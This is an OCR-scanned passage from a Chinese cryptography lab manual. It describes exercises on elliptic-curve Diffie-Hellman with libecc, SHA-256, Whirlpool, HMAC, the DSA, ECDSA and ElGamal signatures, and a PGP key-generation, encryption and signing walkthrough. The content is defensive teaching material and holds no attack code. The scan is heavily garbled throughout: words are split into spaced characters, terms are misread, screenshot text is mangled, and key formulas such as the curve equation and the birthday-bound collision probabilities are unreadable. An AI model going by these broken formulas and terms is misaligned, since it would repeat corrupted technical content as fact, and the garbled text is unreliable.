的 Diffie-Hellman 密 钥 交换 和 椭圆 曲线 加 密 (Elliptic Curves Cryptography, ECC) . 


【原理 简介 】 


第 六 届 国 际 密 码 学 会 


J^ zx 


议 对 应 用 于 公 钥 密码 系统 的 加 密 算 法 推荐 了 两 种 : 基于 大 整数 


因子 分 解 问题 (IFP) 的 RSA 算法 和 基于 椭圆 曲线 上 离散 对 数 计算 问题 CECDLP) 的 ECC 


算法 。4.1 节 中 涉及 的 RSA 算法 的 特点 之 一 是 数学 原理 简 身 


、 在 工程 应 用 中 比较 易于 实 


现 ， 但 它 的 单位 安全 强度 相对 较 低 ， 相 比 之 下 ，ECC 算法 上 
在 工程 应 用 : 
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的 数学 理论 非常 深奥 和 复杂 ， 


1 比较 难于 实现 ， 但 它 的 单位 安全 强度 相对 较 高 ， 也 就 是 说 ， 要 达到 同样 的 


ns X 4G 公 和 钥 密 码 算 法 mem 


安全 强度 ，ECC 算法 所 需 的 密 钥 长 度 远 比 RSA 算法 短 。RSA 的 当前 密 钥 大 小 推荐 值 为 
2048b, 而 小 得 多 的 224b 的 ECC 密 钥 即 可 提供 相同 级 别 的 安全 性 ; 而 随 着 安全 级 别 的 提 
高 ， 这 种 优势 会 变 得 越发 明显 ， 例 如 ，256b 的 ECC 密 钥 与 3072b 的 RSA 密 钥 功 效 完全 
相同 。 这 就 有 效 地 解决 了 为 了 提高 安全 强度 必须 增加 密 钥 长 度 所 带 来 的 工程 实现 难度 的 
问题 ， 且 设备 需要 的 存储 空间 、 功 耗 、 内 存 和 带宽 也 都 较 少 ， 这 使 得 开发 者 可 以 在 诸如 
无 线 设备 、 手 持 计 算 机 、 智 能 卡 和 瘦 客 户 端 等 限定 的 平台 中 实施 加 密 技术 。 目前 ,NIST、 
ANSI 和 IEEE 都 已 对 ECC 进行 了 标准 化 ，ECC 加 密 算法 有 着 广泛 的 应 用 前 景 。 

关于 ECC 基本 原理 及 数学 基础 的 介绍 ， 请 参阅 相关 参考 书 。 

libece 是 一 个 开放 源 代码 的 ECC 算法 开发 包 ， 它 提供 一 组 库 文 件 供 开 发 者 使 用 ， 以 
实现 基于 椭圆 曲线 的 各 类 密码 学 应 用 ， 如 密 钥 交换 、 加 解密 、 数 字 签名 等 。 


【实验 环境 】 
安装 Linux 操作 系统 的 PC 一 台 ， 其 上 安装 gcc 编译 器 。 


【实验 步骤 】 
(1) 从 网 站 libecc.sourceforge.net 下 载 libecc 开发 包 的 最 新 版 本 libecc0.11.1.tar.gz。 
(2) 进入 保存 文件 的 目录 ， 执 行 以 下 操作 完成 libecc 的 安装 。 


$ tar zxvf libecc0.11.1.tar.gz // 解 压缩 文件 
$ cd libecc 0.11.1 // 进 入 解压 后 的 目录 
$ ./configure -prefix=/usr // 进 行 安装 配置 
$ make // 编 译文 件 
$ su // 切 换 到 root 用 户 ,需要 输入 密码 ,$ 变 成 # 
# make install // 安 装 编译 好 的 库 文 件 


(3) 单 击 libecc.sourceforge.net 网 站 主页 上 的 Reference Manual 超 链接 ， 进 入 libecc 
的 内 容 介绍 部 分 。 通 过 网 页 上 的 文字 介绍 以 及 阅读 相关 的 源 代 码 ， 了 解 各 个 类 及 其 成 员 
函数 的 意义 与 调用 方法 。 在 后 面 的 实验 中 ，libecc: :point 类 和 其 成 员 函 数 要 被 直接 调用 ， 
因此 在 这 里 做 一 下 重点 介绍 。 

libecc: :point< Polynomial, a, b > 类 表示 在 椭圆 曲线 六 +ax +b 2 y^ e xy LIA, 
J)。 以 下 是 其 成 员 函 数 的 介绍 。 

e point (void) 创 建 一 个 在 无 穷 远 处 的 点 〈 零 点 ) 。 

e point (polynomial type const &x, polynomial type const &y) 创 建 一 个 与 多 项 式 变 

量 x、y 一 一 对 应 的 点 。 


e point (std: :string x, std: :string y) 创建 一 个 与 字符 串 x 和 y 一 一 对 应 的 点 。 这 里 
相当 于 把 字符 串 x、y 转换 成 了 多 项 式 变量 x'、y'。 

e point & operator- (point const &p1)，“=” 操 作 ， 复 制 点 pl 到 被 操作 的 点 。 

e point & operator+= (point const &p1l)，“+=” 操 作 ， 被 操作 点 与 点 pl 进行“ 加” 
运算 。 


e void MULTIPLY and assign (point const &pnt, mpz class const &scalar), 点 pnt 与 
数 scalar 做 “ 乘 ” 运 算 ， 即 scalar 个 点 pnt 相 “ 加 ”， 结 果 存 入 点 pnt。 
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bool operator— (point const &p1) const 判断 被 操作 数 是 否 与 点 pl 相等 。 

bool operator!= (point const &p1) const 判断 被 操作 数 是 否 与 点 pl 不 相等 。 

bool check (void) const 检查 当前 点 是 否 在 椭圆 曲线 上 或 是 在 无 穷 远 处 。 
polynomial type const & get_x (void) const 获取 该 点 的 x 坐标 。 

polynomial type const & get y (void) const 获取 该 点 的 y 坐标 。 

bool is_zero (void) const 判断 该 点 是 否 是 无 穷 远 点 (零点 ) 。 

void print on (std: ‘ ostream &os) const 输出 该 点 坐标 。 

e void randomize (rds &random_source) 生 成 一 个 椭圆 上 的 随机 点 。 

(4) 尝试 使 用 上 述 成 员 函 数 生成 几 个 点 ， 并 对 其 进行 简单 操作 。 

(5) 尝试 使 用 上 述 成 员 函 数 ， 结 合 相 关 知识 ， 实 现 基于 椭圆 曲线 的 Diffie-Hellman 
交换 。 
(6) 尝试 使 用 上 述 成 员 函 数 ， 结 合 相 关 知识 ， 实 现 基 于 椭圆 曲线 的 ElGamal 加 解密 


算法 。 并 验证 解密 后 的 结果 是 否 就 是 加 密 前 的 值 。 
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【实验 报告 】 

COD fij ECC 算法 相对 于 RSA 算法 的 优 缺 点 。 

(2) 简 述 基于 椭圆 曲线 的 Diffie-Hellman 密 钥 交 换 流 程 。 

G) 简 述 基于 椭圆 曲线 的 EIGamal 加 解密 算法 流程 。 

(4) 列 出 安装 libecc 过 程 中 出 现 的 问题 以 及 解决 方法 。 

【思考 题 】 

(1) 分 别 实现 RSA 与 ECC 算法 ， 比 较 在 相同 的 安全 强度 下 两 者 运行 的 速度 。 
(2) 考虑 用 椭圆 曲线 如 何 实现 数字 签名 。 


第 5 章 um 
杂凑 算法 


5.1 _SHA-256 


【实验 目的 】 

掌握 目前 普遍 使 用 的 SHA 算法 的 基本 原理 ， 了 解 其 主要 应 用 方法 。 

【原理 简介 】 

SHA (Secure Hash Algorithm) 算法 由 美国 NIST 开发 ， 作 为 数字 签名 标准 中 使 用 的 
Hash 算法 ， 并 在 1993 年 作为 联邦 信息 处 理 标准 公布 。 在 1995 年 公布 了 其 改进 版 本 
SHA-1，2001 年 NIST 发 布 了 三 个 额外 的 SHA 变 体 ， 这 三 个 函数 都 将 消息 对 应 到 更 长 的 
消息 摘要 ， 以 它们 的 摘要 长 度 〈 以 位 计算 ) 加 在 原名 后 面 来 命名 : SHA-256，SHA-384 
fll SHA-512. SHA-256 将 不 定 长 的 输入 变换 为 256b 定 长 输出 ,作为 输入 数据 的 摘要 (又 
称 为 数据 指纹 )， 反 映 了 数据 的 特征 。 设 摘要 长 度 为 2， 则 对 于 给 定 输入 数据 ， 找 到 另 一 
不 同 数据 但 具有 相同 摘要 的 概率 为 2”， 根 据 生 日 攻击 的 原理 ， 寻 找到 两 个 不 同 数据 具 
有 相同 摘要 的 概率 为 2, Hash 算法 被 广泛 用 于 数据 完整 性 保护 、 身 份 认证 和 数字 签名 
当中 。 

关于 SHA-256 基本 原理 及 数学 基础 的 介绍 ， 请 参阅 相关 参考 书 。 


【实验 环境 】 
安装 Windows 操作 系统 的 PC 一 台 ， 其 上 安装 VC++ 6.0 以 上 编译 器 。 
【实验 步骤 】 


(1) 从 http://cryptopp.sourceforge.net/docs/ref521/sha_8cpp-source.html 网 页 上 得 到 算 
法 的 源 代 码 。 

(2) 构造 一 个 长 度 为 IKB 左右 的 文本 文件 ， 以 SHA-256 算法 对 文件 计算 Hash 值 。 

G) 在 上 述 文本 文件 中 修改 一 个 字母 或 汉字 ， 再 次 计算 Hash 值 ， 与 步骤 (2) 中 
Hash 值 进行 比较 ， 看 看 有 多 少 比特 发 生 改 变 。 

(4) 测试 SHA-256 算法 的 速度 。 

【实验 报告 】 

(1) 简 述 SHA 算法 流程 。 

(2) 写 出 步骤 (2) 和 步骤 G) 中 的 文本 文件 和 Hash 值 。 

(3) 写 出 所 使 用 机 器 的 硬件 配置 以 及 SHA-256 的 测试 速度 。 
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考虑 Hash 算法 如 何 用 于 数据 完整 性 校 验 ， 与 常用 的 CRC 校 验方 法 有 何不 同 ? 


52 Whirlpool 


【实验 目的 】 
通过 本 实验 ， 掌 握 Whirlpool 算法 的 基本 原理 ， 了 解 其 主要 应 用 方法 。 
【原理 简介 】 


2000 年 ,Vincent Rijmen 和 Paulo S.L.M.Barreto 设计 了 Whirlpool, 它 是 日 前 NESSIE 
(New European Schemes for Signature, Integrity, and Encryption) 唯一 推荐 使 用 的 Hash PÁ 
数 ， 同 时 它 也 被 国际 标准 组 织 ISO 和 国际 电子 技术 协会 TEC 采用 作为 ISO/IEC. 10118-3 
国际 标准 。 

Whirlpool 是 在 分 组 密码 Square 的 基础 上 设计 的 ， 算 法 的 输入 长 度 不 超过 27%, P 
生 512b 的 Hash 值 。 最 初 的 版 本 中 ，S 盒 是 随机 生成 的 ， 具 有 良好 的 密码 学 特性 ，2001 
年 的 版 本 中 ， 对 它 进 行 了 改进 ， 使 其 密码 学 特性 更 好 ， 而 且 更 方便 硬件 实现 ;2003 年 的 
版 本 中 ， 进 一 步 修改 了 扩散 阵列 (Diffusion Matrix). Whirlpool 是 个 很 新 的 算法 ， 实 现 
方面 经 验 很 少 ， 拥 有 与 AES 相似 的 性 能 和 空间 特性 ， 与 SHA-512 相 比 ，Whirlpool 需要 
更 多 硬件 资源 ， 但 性 能 更 好 。 

关于 Whirlpool 基本 原理 及 数学 基础 的 介绍 ， 请 参阅 相关 参考 书 。 


【实验 环境 】 
安装 Windows 操作 系统 的 PC 一 台 ， 其 上 安装 VC++ 6.0 以 上 编译 器 。 


【实验 步骤 】 

(1) MM http://cryptopp.sourceforge.net/docs/ref521/whrlpool_ 8cpp-source.html 网 页 上 得 
到 算法 的 源 代码 。 

(2) 构造 一 个 长 度 为 IKB 左右 的 文本 文件 ， 以 Whirlpool 算法 对 文件 计算 Hash 值 。 

G) 在 上 述 文本 文件 中 修改 一 个 字母 或 汉字 , 再 次 计算 Hash 值 , 与 步骤 (2) 中 Hash 
值 进行 比较 ， 看 看 有 多 少 比特 发 生 改 变 。 

(4) 测试 Whirlpool 算法 的 速度 。 

【实验 报告 】 

(1) 简 述 Whirlpool 算法 流程 。 

(2) 写 出 步骤 (2) 和 步骤 G) 中 的 文本 文件 和 Hash 值 。 

(3) 写 出 所 使 用 机 器 的 硬件 配置 以 及 Whirlpool 的 测试 速度 。 

【思考 题 】 

思考 Whirlpool 与 本 章 前 面 介 绍 的 Hash 算法 的 区 别 。 
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53 HMAC 

【实验 目的 】 

掌握 目前 普遍 使 用 的 HAMC 算法 的 基本 原理 ， 了 解 其 主要 应 用 方法 。 
【原理 简介 】 


HMAC 是 密 钥 相关 的 哈 希 运算 消息 认证 码 (keyed-Hash Message Authentication 
Code), HMAC 运算 利用 哈 希 算法 ， 以 一 个 密 钥 和 一 个 消息 为 输入 ， 生 成 一 个 消息 摘要 
作为 输出 。 

XT HMAC 基本 原理 及 数学 基础 的 介绍 ， 请 参阅 相关 参考 书 。 


【实验 环境 】 
安装 Windows 操作 系统 的 PC 一 台 ， 其 上 安装 VC++ 6.0 以 上 编译 器 。 


【实验 步骤 】 

(1) 从 http://cryptopp.sourceforge.net/docs/ref521/hmac_8cpp-source.html 网 页 上 得 到 
算法 的 源 代码 。 

(2) 构造 一 个 长 度 为 IKB 左右 的 文本 文件 ， 以 HMAC 算法 对 文件 计算 Hash 值 。 

G) 在 上 述 文本 文件 中 修改 一 个 字母 或 汉字 ， 再 次 计算 Hash 值 ， 与 步骤 (2) 中 
Hash 值 进行 比较 ， 看 看 有 多 少 比特 发 生 改变 。 

(4) 测试 HMAC 算法 的 速度 。 

【实验 报告 】 

(1) 简 述 HMAC 算法 流程 。 

(2) 写 出 步骤 (2) 和 步骤 G) 中 的 文本 文件 和 Hash 值 。 

(3) 写 出 所 使 用 机 器 的 硬件 配置 以 及 HMAC 的 测试 速度 。 


【思考 题 】 
思考 HMAC 与 本 章 前 面 介绍 的 Hash 算法 的 区 别 。 
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Th 6 ni "m 
数字 签名 算法 


6.1 DSA 
【实验 目的 】 


Tf DSA 数字 签名 算法 的 设计 原理 和 验证 方法 ， 利 用 crypto++ 密 码 库 函数 实现 
DSA 签名 和 验证 。 


【原理 简介 】 

1991 年 8 月 30 H, 美国 国家 标准 与 技术 学 会 (NIST) 提出 了 一 个 联邦 数字 签名 标 
准 ， 称 之 为 DSS (Digital Signature Standard). DSS 中 采用 的 算法 简 记 为 DSA (Digital 
Signature Algorithm). NIST 提出 :“DSA 适用 于 联邦 政府 的 所 有 部 门 ， 以 保护 未 加 密 的 
信息 …… 它 同样 适用 于 E-mail、 电 子 金 融 信息 传输 、 电 子 数据 交换 、 软 件 发 布 、 数 据 存 
储 及 其 他 需要 数据 完整 性 和 原始 真实 性 的 应 用 。”DSA 应 用 非常 广泛 ， 许 多 软件 厂商 都 
支持 该 签名 算法 。 

DSA 使 用 SHA-1 作为 被 签名 消息 的 摘要 算法 ， 其 签名 长 度 为 320b， 其 安全 性 基于 
计算 离散 对 数 的 困难 性 ， 是 EIGamal 签字 和 Schnorr 签字 的 一 种 变形 。DSA 只 能 用 于 数 
字 签 名 而 不 能 用 于 加 密 。 

有 关 DSA 的 原理 与 数学 基础 请 查阅 相应 的 参考 书 。 


【实验 环境 】 
安装 Windows 操作 系统 的 PC 一 台 ， 其 上 安装 有 VC++ 6.0 以 上 版 本 的 编译 器 。 
【实验 步骤 】 


(1) 从 http//eryptopp.sourceforge.net/docs/ref521/dsa 8cpp-source.html 网 页 上 得 到 算 
法 的 相关 源 代 码 ， 并 将 其 编译 为 一 个 可 执行 的 程序 。 

(2) 产生 DSA 密 钥 对 ， 选 择 一 个 文本 文件 以 私 钥 进行 签名 ， 记 录 签 名 结果 。 

GO 对 签名 用 公 钥 进行 验证 。 随 后 对 文本 文件 内 容 进 行 修 改 ， 再 次 用 公 钥 验证 签名 ， 
记录 验证 的 结果 。 

(4) 测试 DSA 签名 和 验证 的 速度 。 

【实验 报告 】 


(1) 简 述 DSA 的 原理 。 
(2) 记录 产生 密 钥 对 ， 被 签名 文件 和 签名 。 
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G) 记录 使 用 机 器 的 硬件 配置 及 签名 和 验证 的 速度 〈 次 / 秒 )。 


【思考 题 】 
考虑 DSA 签名 算法 与 公 钥 加 密 算 法 的 不 同 之 处 ， 说 明 为 什么 DSA 不 能 用 于 加 密 。 


62 ECDSA 


【实验 目的 】 
THE ECDSA 数字 签名 算法 的 原理 和 验证 方法 ， 利 用 crypto++ 密 码 库 函数 实现 
ECDSA 方法 ， 并 了 解 其 与 DSA 算法 之 间 的 关系 。 


【原理 简介 】 

基于 椭圆 曲线 上 离散 对 数 计算 的 难题 (ECDLP)，1985 年 N.Koblitz 和 Miller 提出 将 
椭圆 曲线 用 于 密码 算法 ， 分 别 利用 有 限 域 上 椭圆 曲线 的 点 构成 的 群 实现 了 离散 对 数 密码 
算法 。6.1 节 的 DSA 算法 也 被 广泛 应 用 在 椭圆 曲线 上 ， 称 为 椭圆 曲线 数字 签名 算法 
ECDSA, H IEEE 工作 组 和 ANSI (American National Standard Institute) X9 组 织 开 发 ， 
被 定 为 X9.62。 一 般 认 为 ECDLP 比 一 般 有 限 域 上 离散 对 数 问题 (DLP) 要 困难 得 多 ， 因 
此 椭圆 曲线 系统 中 每 个 密 钥 位 的 强度 在 本 质 上 要 比 传统 的 离散 对 数 系统 大 得 多 ， 因 而 除 
了 具有 相同 等 级 的 安全 性 外 ，ECC 系统 所 用 的 参数 比 DL 系统 所 用 的 参数 少 。 该 系统 的 
优点 是 参数 少 、 速 度 快 以 及 密 钥 和 证 书 都 较 小 。 这 些 优 点 在 处 理 能 力 、 存 储 空间 、 带 宽 
和 能 源 受 限 的 环境 中 尤其 重要 。 

有 关 ECDSA 的 原理 与 数学 基础 请 查阅 相应 的 参考 书 。 


【实验 环境 】 
安装 Windows 操作 系统 的 PC 一 台 ， 其 上 安装 有 VC++ 6.0 以 上 版 本 的 编译 器 。 


【实验 步骤 】 


关 源 代码 ， 并 将 其 编译 为 一 个 可 执行 的 程序 。 
(2) 产生 ECDSA 密 钥 对 ， 选 择 一 个 文本 文件 以 私 钥 进 行 签 名 ， 记 录 签 名 结果 。 
(3) 对 签名 用 公 钥 进行 验证 。 随 后 对 文本 文件 内 容 进 行 修改 ， 再 次 用 公 钥 验证 签名 ， 
记录 验证 的 结果 。 
(4) 测试 ECDSA 签名 和 验证 的 速度 ， 并 与 DSA 的 签名 和 验证 速度 进行 比较 。 
【实验 报告 】 
(1) 简 述 ECDSA 的 算法 流程 。 
(2) 记录 产生 密 钥 对 ， 被 签名 文件 和 签名 。 
G) 记录 使 用 机 器 的 硬件 配置 及 签名 和 验证 的 速度 〈 次 / 秒 )。 
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【思考 题 】 
比较 ECDSA 和 DSA 的 优 缺 点 ， 并 利用 4.2 节 的 libece 库 重 新 编写 ECDSA. 


63 ElGamal 


【实验 目的 】 
T fff ElGamal 数字 签名 算法 的 设计 原理 和 验证 方法 ， 利 用 crypto++ 密 码 库 函数 实现 
ElGamal 签名 和 验证 。 


【原理 简介 】 

ElGamal 签名 体制 由 工 EIGamal 于 1985 年 提出 。 其 修正 形式 已 被 美国 NIST 作为 数 
字 签 名 标准 (DSS)。 它 是 Rabin 体制 的 一 种 变形 ， 专 门 设计 作为 签名 用 。 方 案 的 安全 性 
基于 求 离散 对 数 的 困难 性 。 它 是 一 种 非 确定 性 的 双 钥 体 制 ， 即 对 同一 明文 消息 ， 由 于 随 
机 参数 选择 不 同 而 有 不 同 的 签名 。 目 前 ，ANSI X9.30-199X 已 将 ElGamal 签名 体制 作为 
签名 标准 算法 。 

有 关 ElGamal 的 原理 与 数学 基础 请 查阅 相应 的 参考 书 。 

【实验 环境 】 

安装 Windows 操作 系统 的 PC 一 台 ， 其 上 安装 有 VC++ 6.0 以 上 版 本 的 编译 器 。 

【实验 步骤 】 

(1) 从 http://cryptopp.sourceforge.net/docs/ref521/elgamal_8cpp-source.html 得 到 算法 
的 相关 源 代码 ， 并 将 其 编译 为 一 个 可 执行 的 程序 。 

(2) 产生 ElGamal 密 钥 对 ， 选 择 一 个 文本 文件 以 私 钥 进 行 签名 ， 记 录 签 名 结果 。 

(3) 对 签名 用 公 钥 进行 验证 。 随 后 对 文本 文件 内 容 进 行 修改 ， 再 次 用 公 钥 验证 签名 ， 


记录 验证 的 结果 。 
(4) 测试 EIGamal 签名 和 验证 的 速度 ， 并 与 DSA 的 签名 和 验证 速度 进行 比较 。 
【实验 报告 】 


(1) 简 述 ElGamal 的 算法 流程 。 
(2) 记录 产生 密 钥 对 ， 被 签名 文件 和 签名 。 
G) 记录 使 用 机 器 的 硬件 配置 及 签名 和 验证 的 速度 〈 次 / 秒 )。 


【思考 题 】 
比较 签名 算法 DSA 与 ElGamal 签名 体制 的 异同 ， 并 指出 ElGamal 签名 具有 哪些 
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71 PGP 


【实验 目的 】 

掌握 目前 十 分 流行 的 加 密 软件 PGP 的 使 用 ， 并 加 深 理解 密码 学 在 网 络 安全 中 的 重 
要 性 。 

【原理 简介 】 

1. PGP 简介 

PGP (Pretty Good Privacy) 是 一 个 基于 RSA 公 钥 加 密 体系 的 加 密 软 件 。 它 可 以 用 来 
加 密 文件 ， 可 以 用 来 对 邮件 保密 以 防止 非 授 权 者 阅读 ， 还 能 对 邮件 加 上 数字 签名 从 而 使 
收 信人 可 以 确认 邮件 的 发 送 者 ， 并 能 确信 邮件 没有 被 算 改 。 同 时 ， 它 提供 一 种 安全 的 通 
信和 方式 , 而 事先 并 不 需要 任何 保密 的 渠道 用 来 传递 密 钥 。 它 采用 了 一 种 RSA 和 传统 加 密 
的 杂 合 算法 ， 用 于 数字 签名 的 邮件 文摘 算法 、 加 密 前 压缩 等 ， 还 有 一 个 良好 的 人 机 工程 
设计 。 它 的 功能 强大 ， 有 很 快 的 速度 。 而 且 它 的 源 代码 是 免费 的 。 

2. PGP 中 的 密码 算法 

PGP 应 用 了 一 个 混合 加 密 算法 ， 它 包含 对 称 密 钥 算法 、 非 对 称 密 钥 算法 、 消 息 报 文 
摘要 等 经 典 的 密码 学 算法 ， 同 时 还 涉及 数字 签名 的 思想 。 它 为 用 户 生成 密 钥 对 之 后 ， 可 


以 进行 邮件 的 加 密 、 签名 、 解密 和 认证 。 在 PGP 中 使 用 的 加 密 算法 和 用 途 如 表 7-1 所 示 。 

表 7-1 PGP 中 使 用 的 各 种 加 密 算法 和 用 途 

密 钥 名 加 密 算法 用 途 

会 话 密 钥 IDEA, AES 对 传送 消息 的 加 解密 ， 随 机 生成 ， 一 次 性 使 用 

AU RSA, Diffie-Hellman 对 会 话 密 钥 加 密 ， 收 信人 和 发 信人 共用 

私 钥 RSA, Diffie-Hellman 对 消息 的 杂凑 值 加 密 以 形成 签字 ， 发 信人 专用 

口令 IDEA 对 私 钥 加 密 以 存储 于 发 送 端 

【实验 环境 】 

Windows XP 系统 ，PGP 8.0 以 上 版 本 (最 新 版 本 是 10.0.3). 

【实验 步 又 】 


] PGPkeys 管理 密 钥 环 。 
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1. 用 户 密 钥 环 的 生成 
(1) 打开 【开始 】| 【程序 】|PGPIPGPkeys， 启 动 PGPkeys， 界 面 如 图 7-1 所 示 。 


PGPkeys 


File Edit View Keys Server Groups Help 
»wpuptr. CA 


Va.. Trust Size Description 


图 7-1 PGPkeys 启动 界面 


(2) 在 PGP Key Generation Wizard 提示 向 导 下 ， 单 击 【 下 一 步 】 按 钮 ， 开 始 创建 密 
钥 对 ， 如 图 7-2 所 示 。 


PGP Key Generation Wizard 


Welcome to the PGP Key 
Generation Wizard 

In order for other people to send you secure messages, 
you must first generate a key pair. 

Your key pair will also be used to sign digital documents. 


A key pair consists of "Pub Key." and "Private 
Key." The public key should be given to everyone you 
know [PGP has faciles to asian tha). The privata key 
should be kept absolutely secret. 


eel esie et ae 
and how PGP works, choose the PGPkeys Help menu. 


Otherwise, choose Next to continue. Expert users can 
click Expert below to have more detailed control. 


Expert 


取消 
图 7-2 PGP 密 钥 对 生成 界面 


G) 输入 名 字 和 邮件 地 址 〈 为 了 用 户 之 间 便 于 辨认 ， 尽 量 使 用 真名 或 别人 熟悉 的 昵 
称 )， 如 图 7-3 所 示 。 

(4) 选择 适当 的 加 密 算 法 和 密 钥 长 度 、 证 书 年 限 等 设置 。 

(5) 输入 用 户口 令 至 足够 长 (至 少 大 于 8 个 字符 )， 可 以 选择 隐 式 输入 确保 口令 安 
全 ， 如 图 7-4 所 示 。 

(6) 单 击 【 完 成 】 按 钮 ， 如 图 7-5 所 示 。 
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PGP Key Generation Wizard 


Name and Email Assignment 
Every key pair must have a name associated with it. The name and email address let 
your correspondents know that the public key they are using belongs to you. 


Eull name: yuanyan 


By associating an email address with your key pair. you will enable PGP to assist your 
correspondents in selecting the corect pubic key when communicating with you. 


Email address:  |yuanyan®163. com 


图 7-3 密 钥 生 成 帮助 界面 


PGP Key Generation Wizard 


Passphrase Assignment 
Your private key will be protected by a passphrase. It is important that you keep this 
passphrase secret and do not write it down. 


Your passphrase should be at least 8 characters long and should contain. 
non-alphabetic characters. 


[Z] Hide Typing 


Passphrase: 


(FF 0 CW 
图 7-4 输入 足够 长 的 用 户口 令 


PGP Key Generation Wizard 


Completing the PGP Key 
Generation Wizard 


You have successfully generated a PGP key pair. 


You wil now be able to receive secure messages and 
sign 


It you wish to send your new public key to a keyserver, 
simply right click on itin PGPkeys, and use the "Send to" 
menu tem. 


Click Finish to close this Wizard and add your new key 
pair to your keyring. 


a) *x* j 
图 7-5 完成 界面 
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(7) 至 此 ， 可 看 到 生成 的 密 钥 出 现在 了 Keys 里 ， 如 图 7-6 所 示 。 


YT Pcpkeys 


File Edit View Keys Server Groups 


Sadh MA E E AA 


日 强 yuanyan <yuanyan@163. com> 
= [E] yuanyan <yuanyan@163. com> 
Ay yuanyan uanyan163. com> DSS exportable 


< 


图 7-6 已 经 生成 的 密 钥 


2. 用 户 公 钥 的 交换 
CD 右键 选择 导出 公 钥 的 用 户 名 ,选择 Export 即 可 导出 公 钥 ， 也 可 选择 Keys|Export 
导出 ， 如 图 7-7 所 示 。 


TI PGPkeys 
File Edit View EOZ Server Groups Help 
Siem Ctrl+S 
Set as Default Key Ctrl+D 
aaa u Description 
回 2048/1024 DH/DSS key pair 
=| [63 yuanyan 
DIL NEM DSS exportable 
evoke 
Reveri fy Signatures 
New Key. Ctrl+N 
Share Split.. 
Inport. Ctrl 


1 key(s) selected Properties. Ctrl+I 
图 7-7 SHAH 
(2) 读者 也 可 用 类 似 的 方式 ， 将 公 钥 发 送 给 邮件 接收 者 (图 略 )。 
G) 导入 公 钥 可 用 如 下 方式 : 双击 打开 所 选 的 公 钥 ， 单 击 Import, WE 7-8 所 示 。 
或 是 通过 Keys|Import 导入 。 


TF Select key(s) 


SelectAl | [ Unselect All 


图 7-8 导入 公 钥 
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(4) 读者 自己 打开 生成 的 密 钥 环 和 导入 的 公 钥 看 看 它们 有 什么 区 别 。 

使 用 PGP 对 文件 进行 操作 。 

为 了 本 实验 能 够 顺利 模拟 ,我 们 在 一 台 主 机 上 需要 建立 两 个 Keys。 建 立方 法 是 ， 首 
先生 成 一 个 用 户 密 钥 环 作为 文件 的 接收 方 和 认证 方 ( 记 作用 户 AD, 记 住 他 的 用 户口 令 并 
导出 公 钥 ， 然 后 将 这 个 公 钥 私 钥 文件 对 储存 在 单独 的 文件 夹 里 。 

删除 这 个 用 户 密 钥 环 ， 新 建 一 个 用 户 作为 文件 的 提供 方 和 认证 及 签字 方 ( 记 作用 户 
B)， 其 他 操作 同上 。 

3. 利用 PGP 加 密 文 件 
(1) 打开 Keys, Hit File|Open 按钮 , 将 用 户 B 文件 夹 里 的 密 钥 环 导出 , 并 加 入 Keys 
中 。 并 将 刚才 导出 的 用 户 A 的 公 钥 导入 ， 如 图 7-9 所 示 。 
(2) 打开 PGP 中 的 另 一 个 程序 : PGPmail， 界 面 如 图 7-10 所 示 。 
TI PcPkeys DER 


File Edit View Keys Server Groups Help 
»EPPrVPZER OB 


Keys Va. Trust Size Description 
4) Ge Linkin Cinlin®163, com> Ə C 2048/1024 DH/DSS public M 


4j) yuanyan <yuenyen@163. com> @ E 2049/1024 — DM/DSS key pair| 


LEN DER 


图 7-9 SAJHP A 的 公 钥 图 7-10 PGPmail 界面 
G) 单 击 第 三 项 对 某 文件 进行 加 密 。 
这 时 ， 它 会 自动 把 默认 用 户 环 作为 加 密 用 的 公 钥 ， 如 图 7-11 所 示 。 这 里 模拟 的 是 利 


pePaail - Key Selection Dialog 


Drag users from this list to the Recipients list Val.. Size 
linin Qinlingl63. com> @Q 2048/1024 


Recipients 
Feiyuanyan <yuanyan@163. com> 


C Text Output 


图 7-11 密 钥 选择 
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用 其 他 用 户 的 公 钥 加 密 ， 故 将 用 户 A 的 公 钥 设 作 加 密 用 。 下 面 还 可 以 选 一 定 的 文件 存储 
方式 ， 这 里 选择 默认 。 

可 以 看 到 ， 加 密 后 的 文件 保存 后 如 图 7-12 所 示 。 

(4) 这 时 可 以 尝试 解密 该 文件 ， 因 为 在 Keys 中 并 没有 用 户 A 的 私 钥 ， 故 无 法 解密 ， 
弹出 如 图 7-13 所 示 的 提示 框 。 


PGPmail — Enter Passphrase 


Message was encrypted to the following public keyls): 
[yuanyan <yusnyan@163. com> (DM/2048) 


It is not possible to decrypt this message because your keyring does not 
contain usable private key(s} corresponding to any of the above public key(s). 


EN I 
图 7-12 文件 被 加 密 后 的 图 标 图 7-13 文件 无 法 解密 提示 


C5) 这 时 将 Keys 中 的 所 有 项 删除 , 将 用 户 A 文件 夹 里 的 密 钥 环 导 入 , 运行 PGPmail 
选择 解密 刚才 被 加 密 过 的 文件 。 这 时 弹出 对 话 框 要 求 输入 用 户口 令 ， 如 图 7-14 所 示 。 


PGPmail 一 Enter Passphrase 


Message was encrypted to the following public key(s) : 


[yuanyan <yuanyan@163. com> (DH/2048) 


Enter passphrase for your private key : 


图 7-14 对 加 密 的 文件 进行 解密 
尝试 使 用 错 的 口令 ， 则 窗口 会 提示 ， 如 图 7-15 所 示 。 


PGPmail - Enter Passphrase 


Message was encrypted to the following public key(s] : 
ruanyan uenyandi63. com> (DH/2048) 


@Re-enter passphrase of your private key Hide Typing 


Cgc) (emen | 
图 7-15 输入 口令 错误 提示 
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直至 输入 正确 口令 ,解密 过 程 可 以 正常 进行 。 请 读者 对 比 一 下 ， 解 密 之 后 的 文件 是 
否 与 原文 件 完 全 一 样 呢 ? 

4. 利用 PGP 数字 签名 

CD 还 是 使 用 用 户 A 的 密 钥 环 ， 打 开 PGPmail， 选 择 第 三 项 ， 进 行 数字 签名 ， 找 到 
需要 进行 数字 签名 的 文件 。 这 时 要 求 输入 口令 ， 如 图 7-16 所 示 。 

(2) 输入 合适 的 口令 ， 就 可 以 得 到 签名 后 的 文件 ， 如 图 7-17 所 示 。 


PGPmail 一 Enter Passphrase 


Signing key: | yuanyan <yuanyan@163.com> — (055/1024) 


Enter passphrase for above key: [v] 


[7] Detached Signature F =" » 2m 

Text Output =| uU 

C Input Is Text = = -一 
图 7-16 “要求 输入 口令 提示 图 7-17 签名 后 的 文件 图 标 


G) 这 时 打开 该 文件 ， 会 得 到 如 图 7-18 所 示 的 签名 者 信息 。 


Nane Signer Key ID Va... 
yuanyan <yuanyan@163, com> Ox08B2F066 Q 2011-7-25 14:23:00 


图 7-18 签名 者 信息 显示 


